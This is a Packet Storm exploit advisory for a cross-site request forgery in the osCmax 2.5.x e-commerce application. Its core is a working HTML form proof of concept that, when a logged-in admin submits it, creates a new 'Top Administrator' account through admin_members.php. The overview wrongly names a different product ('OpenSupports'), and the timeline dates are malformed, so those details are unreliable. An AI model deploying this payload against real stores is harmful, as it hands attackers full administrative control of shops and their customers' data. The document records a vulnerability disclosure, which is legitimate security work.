osCmax 2.5.x Cross Site Request Forgery

2014-03-17T00:00:00
ID PACKETSTORM:125756
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2014-03-17T00:00:00

Description

                                        
                                            `[+] Author: TUNISIAN CYBER  
[+] Exploit Title: osCmax 2.5.X Cross-Site Request Forgery (Add Admin) Vulnerability  
[+] Date: 15-03-2014  
[+] Category: WebApp  
[+] Version: 2.5.X  
[+] Tested on: KaliLinux/Windows 7 Pro  
[+] CWE: CWE-302  
[+] Vendor: http://www.oscmax.com/  
[+] Friendly Sites: na3il.com,th3-creative.com  
[+] Twitter: @TCYB3R  
  
1.OVERVIEW:  
OpenSupports v2.x suffers from a Cross-Site Request Forgery (Add Admin) Vulnerability.  
  
2.Version:  
2.5.X  
  
3.Background:  
osCmax is a powerful e-commerce/shopping cart web application.   
osCmax has all the features needed to run a successful internet store and can be customized to whatever configuration you need.  
http://www.oscmax.com/what_is_oscmax_0  
  
4.Proof Of Concept:  
<html>  
<form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">  
<input type="hidden" name="admin_username" value="THETUNISIAN"/>  
<input type="hidden" name="admin_firstname" value="Moot3x"/>  
<input type="hidden" name="admin_lastname" value="Saad3x"/>  
<input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>  
<input type="hidden" name="admin_groups_id" value="1"/>  
<!-- About "admin_groups_id" -->  
<!-- 1= Top Administrator -->  
<!-- 2= Customer Service -->  
<input type='submit' name='Submit4' value="Agregar">  
</form>  
</html>  
  
5.Solution(s):  
no contact from vendor  
  
6.TIME-LINE:  
2014-15-03: Vulnerability was discovered.  
2014-15-03: Contact with vendor.  
2014-16-03: No reply.  
2014-17-03: No reply.  
2014-17-03: Vulnerability Published  
  
  
  
7.Greetings:  
Xmax-tn  
Xtech-set  
N43il  
Sec4ver,E4A Members  
`